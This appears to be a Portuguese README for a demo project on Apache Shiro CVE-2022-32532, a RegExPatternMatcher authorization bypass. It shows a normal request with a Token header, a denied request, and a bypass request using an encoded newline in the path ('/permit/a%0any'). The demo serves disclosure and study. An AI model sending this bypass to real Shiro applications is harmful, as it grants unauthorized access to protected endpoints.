
Apache Shiro CVE-2022-32532
Este é um projeto de demonstração, que mostra apenas uma das condições para explorar esta vulnerabilidade (CVE-2022-32532).
Na verdade, existem mais maneiras de explorá-la, desde que os desenvolvedores usem RegExPatternMatcher, haverá uma possível vulnerabilidade de bypass.
A verificação do cabeçalho de requisição Token é necessária sob a configuração atual, caso contrário você não tem permissão para acessar a interface sob /permit
Esta requisição pode ser bem-sucedida
GET /permit/any HTTP/1.1
Token: 4ra1n
O acesso não é permitido quando não há cabeçalho de requisição Token
GET /permit/any HTTP/1.1
Pode ser contornado de forma simples em configurações especiais, mas comuns
GET /permit/a%0any HTTP/1.1
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
Esta vulnerabilidade é semelhante ao Spring-Security CVE-2022-22978
Agradecimentos a bdemers (Apache Shiro PMC) e chybeta (Pesquisador de Segurança)